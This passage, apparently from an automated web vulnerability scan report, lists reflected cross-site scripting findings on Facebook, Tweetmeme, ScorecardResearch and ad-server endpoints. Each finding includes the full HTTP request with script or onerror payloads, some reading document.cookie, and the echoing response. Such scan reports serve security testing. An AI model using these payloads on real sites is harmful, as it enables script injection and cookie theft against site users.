User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.29. http://adserver.teracent.net/tase/ad [rcu parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the rcu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c96b6"><script>alert(1)</script>bc28d8f1d07 was submitted in the rcu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=clickc96b6"><script>alert(1)</script>bc28d8f1d07&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.30. http://api.facebook.com/restserver.php [method parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload d8b18<img%20src%3da%20onerror%3dalert(1)>a927144b444 was submitted in the method parameter. This input was echoed as d8b18<img src=a onerror=alert(1)>a927144b444 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?format=json&method=links.getStatsd8b18<img%20src%3da%20onerror%3dalert(1)>a927144b444&urls=http%253A%252F%252Fstarscene.dailystar.com.lb%252Fmusic-scenea960d%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Eb7d5247b69c%252F2010%252F11%252Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%252Fx22&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 24 Jan 2011 21:59:38 GMT
Content-Length: 486

aptureJsonCallback0({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"format","value":"json"},{"key":"method","value":"links.getStatsd8b18<img src=a onerror=alert(1)>a927144b444"},{"key":"urls","value":"http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-pe
...[SNIP]...

4.31. http://api.facebook.com/restserver.php [urls parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 3c957<img%20src%3da%20onerror%3dalert(1)>bc6796fcbae was submitted in the urls parameter. This input was echoed as 3c957<img src=a onerror=alert(1)>bc6796fcbae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?format=json&method=links.getStats&urls=http%253A%252F%252Fstarscene.dailystar.com.lb%252Fmusic-scenea960d%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Eb7d5247b69c%252F2010%252F11%252Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%252Fx223c957<img%20src%3da%20onerror%3dalert(1)>bc6796fcbae&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 24 Jan 2011 14:02:02 -0800
Pragma:
X-Cnection: close
Date: Mon, 24 Jan 2011 22:00:02 GMT
Content-Length: 644

aptureJsonCallback0([{"url":"http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx223c957<img src=a onerror=alert(1)>bc6796fcbae","share_count":0,"like_count":0,"comment_count":0,"total_count":0,"click_count":0,"normalized_url":"http:\/\/starscene.dailystar.com.lb\/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C\/sc
...[SNIP]...

4.32. http://api.tweetmeme.com/url_info.jsonc [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.tweetmeme.com
Path:	/url_info.jsonc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 71bc0<script>alert(1)</script>955adaf598b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&callback=aptureJsonCallback171bc0<script>alert(1)</script>955adaf598b HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 21:58:59 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 377
X-Served-By: h03
Content-Length: 117

aptureJsonCallback171bc0<script>alert(1)</script>955adaf598b({"status":"failure","comment":"unable to resolve URL"});

4.33. http://autotrader.tt.omtrdc.net/m2/autotrader/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://autotrader.tt.omtrdc.net
Path:	/m2/autotrader/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload e2e0e<script>alert(1)</script>1600fae3df4 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/autotrader/mbox/standard?mboxHost=www.autotrader.com&mboxSession=1295921983404-727382&mboxPage=1295921983404-727382&screenHeight=1200&screenWidth=1920&browserWidth=1155&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&page=%2Findex.jsp&mbox=global_csse2e0e<script>alert(1)</script>1600fae3df4&mboxId=0&mboxTime=1295900383412&mboxURL=http%3A%2F%2Fwww.autotrader.com%2F%3Fbc4cb%2522%253balert(document.cookie)%2F%2F1ee177b82c%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F55&mboxVersion=39 HTTP/1.1
Host: autotrader.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 206
Date: Tue, 25 Jan 2011 04:30:42 GMT
Server: Test & Target

mboxFactories.get('default').get('global_csse2e0e<script>alert(1)</script>1600fae3df4',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1295921983404-727382.17");

4.34. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload d1e99<script>alert(1)</script>017bbe15adf was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8d1e99<script>alert(1)</script>017bbe15adf&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:32 GMT
Date: Tue, 25 Jan 2011 04:27:32 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8d1e99<script>alert(1)</script>017bbe15adf", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.35. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload cf572<script>alert(1)</script>be998e59288 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=&c10=cf572<script>alert(1)</script>be998e59288&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:37 GMT
Date: Tue, 25 Jan 2011 04:27:37 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com", c5:"", c6:"", c10:"cf572<script>alert(1)</script>be998e59288", c15:"", c16:"", r:""});

4.36. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 3fa48<script>alert(1)</script>a33599a785c was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=&c10=&c15=3fa48<script>alert(1)</script>a33599a785c HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:38 GMT
Date: Tue, 25 Jan 2011 04:27:38 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com", c5:"", c6:"", c10:"", c15:"3fa48<script>alert(1)</script>a33599a785c", c16:"", r:""});

4.37. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 9ff59<script>alert(1)</script>ec861509ebc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=30056939ff59<script>alert(1)</script>ec861509ebc&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:33 GMT
Date: Tue, 25 Jan 2011 04:27:33 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"30056939ff59<script>alert(1)</script>ec861509ebc", c3:"3", c4:"http://www.tweetmeme.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.38. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d043f<script>alert(1)</script>72d7f31550d was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3d043f<script>alert(1)</script>72d7f31550d&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:34 GMT
Date: Tue, 25 Jan 2011 04:27:34 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3d043f<script>alert(1)</script>72d7f31550d", c4:"http://www.tweetmeme.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.39. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 9dfc1<script>alert(1)</script>ed1e8fa244a was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com9dfc1<script>alert(1)</script>ed1e8fa244a&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:36 GMT
Date: Tue, 25 Jan 2011 04:27:36 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com9dfc1<script>alert(1)</script>ed1e8fa244a", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.40. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 84bc2<script>alert(1)</script>2159a214127 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=84bc2<script>alert(1)</script>2159a214127&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:37 GMT
Date: Tue, 25 Jan 2011 04:27:37 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com", c5:"84bc2<script>alert(1)</script>2159a214127", c6:"", c10:"", c15:"", c16:"", r:""});

4.41. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 354be<script>alert(1)</script>f770b61399d was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c5=&c6=354be<script>alert(1)</script>f770b61399d&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 01 Feb 2011 04:27:37 GMT
Date: Tue, 25 Jan 2011 04:27:37 GMT
Connection: close
Content-Length: 3605

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ngth-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://www.tweetmeme.com", c5:"", c6:"354be<script>alert(1)</script>f770b61399d", c10:"", c15:"", c16:"", r:""});

4.42. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c264"><script>alert(1)</script>21d6b206b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM5c264"><script>alert(1)</script>21d6b206b37/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660; Dominos=DataXuB3; RMFM=011PhXovU106w2; session=1295919344|1295919347

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM5c264"><script>alert(1)</script>21d6b206b37/DLX/1036330295/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SR
...[SNIP]...

4.43. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
